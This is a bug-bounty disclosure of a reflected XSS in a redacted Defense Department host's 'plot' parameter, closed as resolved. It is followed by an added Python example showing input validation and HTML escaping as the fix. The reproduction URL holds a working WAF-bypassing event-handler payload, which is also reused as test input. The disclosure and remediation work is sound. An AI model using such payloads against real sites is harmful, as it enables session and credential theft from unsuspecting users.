Reflected XSS | https://████████
Medium
U.S. Dept Of Defense
Reported by x3ph_
Vulnerability Details
## Summary
Hi team, there's a reflected XSS on https://████ using the `plot` param. There's a WAF in place but it's possible to bypass it.
## Steps to reproduce
1. Click https://██████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE
2. Observe the popup showing document.domain when right clicking "RIGHT CLICK HERE"
███
## Impact
The attacker can trigger remote code execution on the victim’s browser, and steal credentials, sessions, and potentially send malware to the victim.
## System Host(s)
██████
## Affected Product(s) and Version(s)
## CVE Numbers
## Suggested Mitigation/Remediation Actions
Report Details
State: Closed
Substate: Resolved
Weakness: Cross-site Scripting (XSS) - Reflected
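
A server-side fix for the reflection reported above, as an added example that is not part of the original report or the affected site's code. It assumes the handler echoes `plot` into an HTML response and that valid plot names fit a simple allowlist; the function names, the pattern and the response markup are hypothetical. The WAF stays as defence in depth, while the fix is validation plus output encoding in the handler itself.

```python
import html
import re
from typing import Tuple
from urllib.parse import parse_qs

# Assumption: legitimate plot identifiers are short names made of these characters.
PLOT_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Query string taken from the report's reproduction step.
REPORTED_QS = "plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE"


def get_plot(query_string: str) -> str:
    """Return the URL-decoded value of the first `plot` parameter, or ''."""
    return parse_qs(query_string).get("plot", [""])[0]


def render_unsafe(query_string: str) -> str:
    """The 'before' pattern: the decoded parameter is concatenated into HTML."""
    return "<p>Plot not found: " + get_plot(query_string) + "</p>"


def render_escaped(query_string: str) -> str:
    """Output encoding alone: markup characters become inert entities."""
    return "<p>Plot not found: " + html.escape(get_plot(query_string), quote=True) + "</p>"


def render_safe(query_string: str) -> Tuple[int, str]:
    """Allowlist validation first, output encoding regardless."""
    plot = get_plot(query_string)
    if not PLOT_NAME.fullmatch(plot):
        # Rejected input is never echoed back to the client.
        return 400, "<p>Invalid plot name.</p>"
    return 200, "<p>Plot not found: " + html.escape(plot, quote=True) + "</p>"


if __name__ == "__main__":
    print(render_unsafe(REPORTED_QS))
    print(render_escaped(REPORTED_QS))
    print(render_safe(REPORTED_QS))
    print(render_safe("plot=temp_2024-01.png"))
```
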